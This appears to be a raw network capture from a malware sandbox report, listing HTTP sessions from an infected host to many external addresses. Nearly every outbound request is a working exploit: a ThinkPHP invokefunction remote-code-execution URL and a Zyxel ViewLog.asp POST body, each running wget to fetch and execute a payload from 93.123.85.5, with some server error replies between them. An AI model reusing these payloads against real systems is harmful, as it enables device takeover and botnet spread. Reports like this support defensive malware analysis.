                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 35 61 31 36 30 32 26 23 34 36 3b 31 36 39 39 39 31 30 33 35 33 26 23 34 36 3b 64 31 34 62 37 38 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;45a1602&#46;1699910353&#46;d14b78e</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              444192.168.2.233835888.221.206.12180
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:13.810934067 CET9121OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:14.130604982 CET9187INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 258
                                                              Expires: Mon, 13 Nov 2023 21:19:13 GMT
                                                              Date: Mon, 13 Nov 2023 21:19:13 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 32 62 35 33 65 31 37 26 23 34 36 3b 31 36 39 39 39 31 30 33 35 33 26 23 34 36 3b 32 64 37 34 33 30 37 33 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;92b53e17&#46;1699910353&#46;2d743073</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              445192.168.2.233650695.214.145.2318080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:14.299700975 CET9199OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              446192.168.2.235156095.217.104.1388080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:14.305943966 CET9200OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              447192.168.2.235769294.122.70.1928080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:14.337039948 CET9203OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              448192.168.2.2349858112.162.254.20480
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:14.398925066 CET9205OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              449192.168.2.2350358112.165.192.20280
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:14.403281927 CET9206OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              45192.168.2.235491631.136.164.2128080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:16.322833061 CET2074OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:17.331231117 CET2208OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:19.379034996 CET2462OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:23.570450068 CET2946OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:31.761344910 CET3991OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:48.143331051 CET5994OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:22.186820030 CET10166OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              450192.168.2.2339358112.175.85.10480
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:14.425657034 CET9207OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:14.732295036 CET9284INHTTP/1.1 400 Bad Request
                                                              Server: openresty
                                                              Date: Mon, 13 Nov 2023 21:19:13 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 154
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              451192.168.2.235583488.84.194.20180
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:14.459878922 CET9208OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              452192.168.2.235320894.26.75.1718080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:14.659842014 CET9210OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:14.996890068 CET9312INHTTP/1.1 302 Found
                                                              Location: https://192.168.0.14:443/cgi-bin/ViewLog.asp
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              453192.168.2.234412631.136.148.2018080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:14.663582087 CET9211OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:15.659625053 CET9344OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:17.643467903 CET9580OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:21.674935102 CET10060OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:29.609826088 CET11012OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:45.479715109 CET12977OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:17.475467920 CET17040OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              454192.168.2.233459485.234.110.2248080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:14.666405916 CET9211OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              455192.168.2.234655294.121.191.2318080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:14.689142942 CET9276OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              456192.168.2.235802894.122.68.1188080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:14.689194918 CET9276OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              457192.168.2.235764695.86.88.48080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:14.965117931 CET9310OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              458192.168.2.235833294.131.64.1558080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:15.119153976 CET9319OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:15.329196930 CET9333INHTTP/1.1 400 Bad Request
                                                              Server: squid/3.5.20
                                                              Mime-Version: 1.0
                                                              Date: Mon, 13 Nov 2023 21:19:15 GMT
                                                              Content-Type: text/html;charset=utf-8
                                                              Content-Length: 3562
                                                              X-Squid-Error: ERR_INVALID_URL 0
                                                              Vary: Accept-Language
                                                              Content-Language: en
                                                              X-Cache: MISS from ezproxies.com
                                                              X-Cache-Lookup: NONE from ezproxies.com:8080
                                                              Via: 1.1 ezproxies.com (squid/3.5.20)
                                                              Connection: close
